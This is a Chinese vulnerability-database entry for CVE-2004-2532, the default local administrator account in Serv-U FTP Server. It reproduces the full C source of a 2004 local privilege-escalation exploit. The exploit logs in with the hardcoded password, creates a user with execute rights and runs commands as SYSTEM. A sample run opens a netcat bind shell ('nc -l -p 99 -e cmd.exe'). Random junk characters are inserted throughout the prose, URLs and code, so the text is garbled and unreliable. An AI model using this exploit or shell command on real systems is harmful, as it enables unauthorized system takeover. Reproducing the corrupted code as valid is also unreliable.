RhinoSoft Serv-U FTP Server默认管理帐户漏洞

漏洞ID 1108112 漏洞类型 信任管理问题
发布时间 2004-08-08 更新时间 2020-07-29
CVE编号 CVE-2004-2532

CNNVD-ID CNNVD-200412-693
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://ww8 p &w.exploit-db.com/exploits/381
http://www.cnnvd.org.cn/web/xxk/ldxqBi v e - r JyId.tag?CNNVD=CNNVD-200412-693B M F , L r U T
|漏洞详情
SolarWin: , 2 x ) r A {ds Serv-U File Server是美国SolarWinds公司的一款文件传输服务器。
SolarWinds Serv-U File SZ 8 J S 3erver 5.1.0.0之前版本中存在信任管理问题漏洞,该漏洞源于该服务器带有用于本地管理z 2 ^ v w (的默认账户和密码。攻击者可利用该漏洞执行任意命令。
|漏洞EXP
/*
* Hax0rcitos proudly presents
* Serv-u Local Exploit >v3.x. (tested al^ E p ) m $ ?so aga+ e  Zinst last version 5.1.0.0)
*
* All Serv-u? A o S J S 6 Versions have default Login/password for local Administration.
* This accouR L tnt is only af W S G B 7vailable to conn(  2 a ` {ect in the loopback interface, so a
* local user will be able to connect to Serv-u with this account and create
* an ftp user with execute rO N 0 ights. after the user is created, just connect
* to the ftp server and0 U + 2 ] { * U * execute a raw "SITE EXEC" command. the prl ` ) G o f . { ogram wil{ n 7 !l
* be execute with SYSTEM privileges.
*
* Copyright (c) 2003-2004  Haxorcitos com . All Rights Reserved.
*
* THIS PROGRH D eAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANm Y L S & X [ !TY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*
* Date:   10/2003
* Author: Andrs Tarasc Acunha
*q t R 7 M q m c O
* Greetings to: #haxorcitos - #P s 4 m l ^localhost and #!dsr blackxors =)
*
* TestI n T 9 6 A ^ Red Against Serv-u 4r ! Y d t o m P |.x and v5.1.0.0
G:\exploit\serv-U\local>whoami
INSANE\& U j qaT4r
G:\exploit\serv-U\local>servO / M N yulocal.exe "nc -l -p 99 -e c- Q N I Rmd.exe"
Serv-u >3.x Local Exploit by Haxorcitos
<220 Serv-U FTP Server v5.0 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
*************************h k s X*****************% Q m x**********| : D n Y Z b n**
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
****************************************9 r % v C**************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
<200-DomainID=3
220 Domain settinO O O W Bgs saved
****************************************S } w = 7 }**************
[+] Domain Haxorcitos:3 Created
[+] Setting New Domain Online
<L 9 $ Y ) @ -220 Server command OK
******************************************************
[+] Creating Evil User
<200-User=haxorcitos
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER haxB y I n H c Xorcitos
<331 User name okay, need password.
******************************************************
&W $ H 9 e [gt;PASS whitex0r
<230 User logged( - J F T in, proceed.
*************************B D W , Y e h*****************************
[+] Now Executing: nc -l -p 99 -e cmd.exe
<220 Domain deleted
******************************************************
G:\exploit\serv-U\local>nc localhost 99
Microsoft Windows XP [Versin 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>whoami
whov A D * - n sami
NT AUTHORITY\SYSTEM
C:\>
*/
#include <stdio.h>7 { y ? & [
#include <stdlib.h>
#include <winsock2.h>, l * w k J;
#include <io.? 7 _ } N  q 6h>
#include <S : V;process.h> o Y g : `
//Responses
#define BANNER                  "220 "
#O ! m l 5 R B .defin; h ( 1 M 3 w ( we U$ _ i + sSEROK                  "331 User name okay"
#define PASSOK                  "230 User logged in, proceed."
#define ADMOK                   "230-Switching to SYSTEM MAINTENANCE mode."
#define DO0 l $MAINID                "200-{ 1 Y A [ ? rDomainID=X Y o w F & k :"
//Commands
#deg +  2 ^ ~ w #fine XPLUSER                    "USERu ] [ L M 7 L v hax; ( Y = orcitos\r\n"
#define XPLPASSWORD                "PASS whitex0rC b g c F 5 B\r\n"
#define USER                    "USER LocalAdministrator\r\n"
#define PASSWORD                "PAS) | j / [ g gS #l@$ak#.lk;0@P\r\n"
#define MAINTENANCE             "SITEY / U MAINTENANCE\r\n"
#define EXIT                    "QUIT\r\n"
char newdomain[]="-SETDO- C $MAIN% L /\r\n"
"-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n"
"-TZOEnable=0\r\n"
" TZOKey=\r\n";
/*               "-DynDNSEnable=0\r\n"
" DynIPName=\r\n";
*/
char deldomain[]="-DELETEDOMAIN\r\n"
"-IP=0.0.0.0\r\n"
" PortNo=2121\r\n";
char newuseb & V c ] hr[] =
"-SETUSERSETUP\r\n"
"-IP=0.0.0.0\r\n"
"-PortNo=213 V m } - I u21\r\n"
"-User=haxorcitos\r\n"
"-Password=whitex0r\r\n"
"-HomeDir=c:\0 , O ^ g n\\r\n"
"-LoginMesFile=\r\n"
"-Disable=0\r\n"
{ t %"-RelPaths=1\r\n"
"-NeedSecure=0\ro z O h (K s . @ 1 #n"
"-HideHidden=0\r\n"
"-AlwaysAllowLogin=0\r\n"
"-ChangePassword=v H 8 8 4 N 2 N0\r\n"
"-QuotaEnable=0\r\nQ Y L"
"-MaxUsersLoginPerIP=-1\r\n"
"-SpeedLimitUp=0\r\n"
"-Spee: B [ Q NdLimitDown=0\r\n$ C = C H"
"-MaxNrUsers=-1\r\n"
"-IdleTimeOut=600\r\n"
"-SessionTimeOut=-1L @ & o ~r\n"
"-Expire=0\r\- j i g Fn"
"-RatioUp=1\r\n"
"-RatioDown=1\r\n"
"-RatiosCreditv M , /=0\^ * I p t d .r\n"
"-QuotaCurrent=0\r\n"
"-QuotaMaximum=0\r\n"
"-Mai5 c C q v u 1 qntenan} / N - ^ Zce=NonH d n ve\r\n"
"-PasswordType=Regular\r\n"
"-Ratios=None\r\n"
" Acces q C ` ss=c:\\|RELP\r\n";
#define localport 43958
#define localip "127.0.0.1"
char cadena[1024];
int rec,domE L _ w n w W b Gain;
/******C # u************************` V R = * . q************************************************/
voidG c ; & ]  k ParseCommands(int sock, char *data, int ShowSend, int showResponses,
cha6 a D p ;  R 4 6r *response) {
send(sock,data,strlen(data),0);
if (ShowSend) printf(">%s",data);
Sleep(100);
do {
rec=recv(sock,r @ l hcadena,sizeof(cadena),0)i 2 C -; cadena[rec]='\0';
if (rec<=0) return;
if (showReo E F J ( ] 7sponses) printf("<%s",cadena);
if (strncmp(8 ! [cadena, DOMAINID,strlen(DOM| 3 ( _ PAINID))==0)
domain=atoi(cadena+strlen(DOMAINID));
//} while (strncmp(cadena,response,stx I q x ? &rlen(resd 1 5 o ` Gponse)r , % o n o)!=0);
} while (strstr(cay V d u R r y 2dena,response)D I k d I i p==NULL);
prinW R 3 K Utf("***********************************; k r @ I v*******************\r\n");
}
/***********************************************************9 O w*****h g L y**************/
int main(int argc, char* argv[])
{
WSAD% _ n - b & 3 2ATA ws;
ie / w ,nt sock,sock2;
struct sockaddr_in haxorcitos;
struct sockaddr_in xpl;
printf("Serv-u >3.x Local Exploit by Haxorcitos\r\n\r\n");
if (argc<2) {
printf(! | b . ) L G 0 Z"USAGE:   ServuLocal.exe \"command\"\r\n");
print? _ Nf("ExJ  T , 9 (ample: ServuLocal.exe \"nc.exe -l -p 99 -e cmdQ b H 2 q.exe\"");
return(0);
}
if	(WSAStartup( MAKEWORD(2,2), &ws )!=0) {
prints D X u $f(" [-] WSAStartupE ! R() error\n");
exit(0);j = w O 9 T _
}
haxorciV ( 8 3 @tos! ~ } 1 : s Z.sin_family = AF_INET;
haxorcitos.sin_port = htons(localport);
haxorcitos.si/ 1 i J Kn_addr.s_addr = inet_addr(localip);
sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
cor } b { Tnnect(sock,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos));
rec=recv(sockp I O B ;  t U G,cadena2 d 4,sizeof(cadena),0); cadena[rec]='\0';
pri9 V ) P w ` 2ntf("<%s",cadena);
ParseCommands(sock,USER,1,1,USEROK);
ParseCommands(sock,PASSWORD,1,1,PASSOK);
ParseCommands(sock,MAINTENANCE,1,0,"230 ");
printf("[+] Creating New Domain...\r\n");
ParseCommands(sock,newdomain,0,1,BANNER);
printf("[+] Domain Haxorcitos:%i Created\n",domain);
/* Only} 3 f D ( I for v5.x
printf("[+] Setting New Domain Online\r\n");
sprintf(cadena,"-SERVERCOMMAND\r\n-ID=%i\r\n
Command=DomainV 9 : a WOnline\r\n",domain);
ParseCommands * q ; i $ d(sock,cadena,0,1,BANNER);
*/
printf("[+] Creating Evil User\r\n");
ParseCommands(sock,newuser,0,1,"200 ");
Sleep(1b + F y ? O % C000);
prinx i ]tf("[+] Now Exploiting...\r\n");/ A Z ; E D Y d i
xpl.sin_famil t 3 u p 1 ` ~ ry = AF_INE| ; R pT;
xpl.sin_port = htons(2121);
xpl.sin_addr.s_addr = inet_addr(localipI t T 4 z [);
sock2=socket (AF_INET, SOCK_ST d u 4 d d t M FTREAM, IPPROTO_TCz q Q T I W V v {P);
connect(sock2,( struct sockA : i  i maddr *)&xpl,sizeof(xpl));! { B U ] S
rec=recv(sock2,cadena,sizeof(cadena),0); cad, |  b `ena[rec]='\0';
Par* m / |seCommands(sock2,XPLUSEi v A 5 Q  h wR,1,1,USEROK);
ParseCommands(sock2,XPLPAD ~ P E t ~ -SSWORD,1,1,PASSOK);
printf("[+] Now Executing: %s\r\n",argv[1]);
spr6 O Sintf(cadei ) o X t 2 Z Zna,"site exec %s\r\n",argv[1]);
send(sock2,cade= ; 8 * T * Z e hna,strlen(cadena),0);
shutdown(sock2,SD_BOTH);
Sleep(100);
ParseCommands(sock,deldomain,0,1,BANNER);
s8 0 W 5 T 7 s = iend(sock,EXIT,strlm i v H xen(EXIT),0);
shutdown(sock,SD_BOTH);
closesocket(sock);
closesocket(sock2);
return 0;
}
// milw0rm.com [2004-08-08]
|参考资料

来源:XF
名称:servu-default-admin-account(16925)
链接:http://xforce.iss.net/xforce/xfdb/16925
来源:BID
名称:10886
链接:http://www.securityfocus.com/bid/10886
来源:OSVDB
名称:88} 6 ` % N77
链接:http://www.osvdb.org/8877
来源:FULLDISC
名称:20040808Serv-Y w K AU3.x,4.x,5.xlocalprivilegeescalationvulnerability
链接:http://archives.neohapsis.com/archivesK / R 6 A T L/fulldn N disclosure/2004-08/0216.html